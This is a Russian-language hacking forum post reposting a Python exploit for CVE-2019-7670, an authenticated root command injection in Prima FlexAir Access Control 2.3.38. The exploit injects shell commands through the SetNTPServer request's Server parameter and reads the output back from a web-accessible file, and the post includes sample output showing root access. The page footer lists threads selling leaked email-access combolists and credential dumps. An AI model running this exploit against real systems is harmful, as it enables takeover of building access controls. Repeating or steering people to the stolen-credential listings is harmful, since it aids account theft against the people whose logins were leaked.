Интересно - Prima FlexAir Access Control 2.3.38 - Remote Code Execution

GhosTM@n

Original poster

Pro Member

27.03.2020

# Exploit Title: Prima FlexAir Access Control 2.3.38 - Remote Code Execution
# Google Dork: NA
# Date: 2018-09-06
# Exploit Author: LiquidWorm
# Vendor Homepage:

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

# Software Link:

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

# Version: 2.3.38
# Tested on: NA
# CVE : CVE-2019-7670

#!/usr/bin/env python
#
# Authenticated Remote Root Exploit for Prima FlexAir Access Control 2.3.38
# via Command Injection in SetNTPServer request, Server parameter.
#
# CVE: CVE-2019-7670
# Advisory:

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

# Paper:

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

#
# By Gjoko 'LiquidWorm' Krstic
#
# 18.01.2019
#
################################################## ##########################
#
# $ python ntpcmdinj.py
# [+] Usage: python ntpcmdinj.py [Target] [Session-ID] [Command]
# [+] Example: python ntpcmdinj.py

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

10167847 whoami
#
# $ python ntpcmdinj.py

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

11339284 "uname -a"
# Linux Alpha 4.4.16 #1 Mon Aug 29 13:29:40 CEST 2016 armv7l GNU/Linux
#
# $ python ntpcmdinj.py

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

11339284 id
# uid=0(root) gid=0(root) groups=0(root),10(wheel)
#
################################################## ##########################
#

import requests
import sys#####

if len(sys.argv) < 4:
print '[+] Usage: python ntpcmdinj.py [Target] [Session-ID] [Command]'
print '[+] Example: python ntpcmdinj.py

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

10167847 whoami\n'
sys.exit()

host = sys.argv[1]
sessionid = sys.argv[2]
commando = sys.argv[3]

url = host+"/bin/sysfcgi.fx"

headers = {"Session-ID" : sessionid, # Muy importante!
"User-Agent" : "Dj/Ole",
"Content-Type" : "application/x-www-form-urlencoded; charset=UTF-8",
"Accept" : "text/html, */*; q=0.01",
"Session-Pc" : "2",
"X-Requested-With" : "XMLHttpRequest",
"Accept-Encoding" : "gzip, deflate",
"Accept-Language" : "en-US,en;q=0.9"}

payload = ("<requests><request name="SetNTPServer">"
"<param name="Server" value="2.europe.p"
"ool.ntp.org;"+commando+">/www/pages/ap"
"p/images/logos/stage.txt|"/></request></"
"requests>")

requests.post(url, headers=headers, data=payload)

e = requests.get(host+"/app/images/logos/stage.txt")
print e.text

Автор	Заголовок	Раздел	Дата
	[15.279] Lines Mail Access AiCombo Hits	Раздача email	29.05.2025
B	[2.706.439] ☣️Lines Leak 2025 Good for Access	Раздача email	29.05.2025
M	Valid 4.9k TOP Qualitu CORP Mail Access By MegaCloud 28.05	Раздача email	29.05.2025
M	Valid 1K Just Japan Mail Access By MegaCloud 28.05	Раздача email	29.05.2025
M	Valid 1.7K Just ChinaMail Access By MegaCloud 28.05	Раздача email	28.05.2025
	[24.589] Lines Mail Access AiCombo Hits	Раздача email	28.05.2025
M	Valid 23K Full Valid Germay Mail Access By MegaCloud 28.05	Раздача email	28.05.2025
	[13.330] Lines UHQ Combolist With Mail Access	Раздача email	28.05.2025
	[16.637] Lines Europa mixed with Mail Access	Раздача email	28.05.2025
M	Valid 16K Full Valid Mail Access Mix by MegaCloud 28.05	Раздача email	28.05.2025
	[28.947] Lines Europa mixed with Mail Access	Раздача email	28.05.2025
	[25.494] Lines Mail access Combo Leak	Раздача email	28.05.2025
	[21.034] Lines Valide Access Combolist EU+US	Раздача email	28.05.2025
	[18.900] Lines Mail access Combo Leak	Раздача email	28.05.2025
	[14.757] Lines GOod For Gaming, Streamig site with Mail Access	Раздача email	27.05.2025
M	Valid 1k Full Valid mail Access Mix by MegaCloud 27.05	Раздача email	27.05.2025
M	Valid 3.5K CORPORATE MAIL ACCESS By MegaCloud 27.05	Раздача email	27.05.2025
M	Valid 339X ⭐️USA⭐️ Full Mail Access by megaCloud 27.05	Раздача email	27.05.2025
	[10.459] Lines Europa mixed with Mail Access	Раздача email	27.05.2025
M	Valid 2.6K Just ⭐️ Corp ⭐️ MAIL ACCESS By MegaCloud 27.05	Раздача email	27.05.2025
M	Valid 633X ⭐️JAPAN⭐️ Just Full Valid Mail Access By MegaCloud 27.05	Раздача email	27.05.2025
M	Valid 1.3K ⭐️China⭐️ Full Valid MAIL ACCESS 27.05	Раздача email	27.05.2025
M	Valid 22K Full Mail Access Germany Hits By MegaCloud 26.05	Раздача email	27.05.2025
M	Valid 13K Full Valid Mail Access Mix By MegaCloud 27.05	Раздача email	27.05.2025
	[12.873] Lines UHQ Access Valide EU Combolist	Раздача email	26.05.2025
M	Valid 900X JUST USA Mail Access Full Hits 26.05	Раздача email	26.05.2025
	[26.062] Lines GOod For Gaming, Streamig site with Mail Access	Раздача email	26.05.2025
M	Valid 5.9K Just China Full Mail Access By MegaCloud 26.05	Раздача email	26.05.2025
M	Valid 4.7 Full Valid Mail Access Mix By MegaCloud 26.05	Раздача email	26.05.2025
	[10.673] Lines UHQ Combolist With Mail Access	Раздача email	26.05.2025
M	Valid 8 K Mail Access MIX By MegaCloud 26.05	Раздача email	26.05.2025
M	Valid 29K Just Full Valid Mail Access Mix By MegaCloud 26.05	Раздача email	26.05.2025
	[29.370] Lines GOod For Gaming, Streamig site with Mail Access	Раздача email	26.05.2025
	[11.205] Lines UHQ Combolist With Mail Access	Раздача email	26.05.2025
	[13.585] Lines UHQ Access Valide EU Combolist	Раздача email	26.05.2025
	[26.809] Lines UHQ Combolist With Mail Access	Раздача email	25.05.2025
M	Valid 9.5K Full Valid Mail Access Mix By MegaCloud 25.05	Раздача email	25.05.2025
	[28.254] Lines UHQ Combolist With Mail Access	Раздача email	25.05.2025
	[23.388] Lines Europa mixed with Mail Access	Раздача email	25.05.2025
	[29.031] Lines Mail Access AiCombo Hits	Раздача email	25.05.2025
	[28.070] Lines UHQ Combolist With Mail Access	Раздача email	24.05.2025
	[13.248] Lines UHQ Access Valide EU Combolist	Раздача email	24.05.2025
M	Valid 2.3K Just Corp Mail Access By MegaCloud 24.05	Раздача email	24.05.2025
M	Valid 13.6K Germany Full Valid Mail Access By MegaCloud 24.05	Раздача email	24.05.2025
	[18.116] Lines GOod For Gaming, Streamig site with Mail Access	Раздача email	24.05.2025
	[29.694] Lines Europa mixed with Mail Access	Раздача email	24.05.2025
	[19.839] Lines Mail access Combo Leak	Раздача email	24.05.2025
M	Интересно 4.1K Full Valid Mail Access Mix By MegaCloud 23.05	Раздача email	23.05.2025
	[13.085] Lines Europa mixed with Mail Access	Раздача email	23.05.2025
	[20.867] Lines UHQ Access Valide EU Combolist	Раздача email	23.05.2025

Интересно Prima FlexAir Access Control 2.3.38 - Remote Code Execution

GhosTM@n

Название темы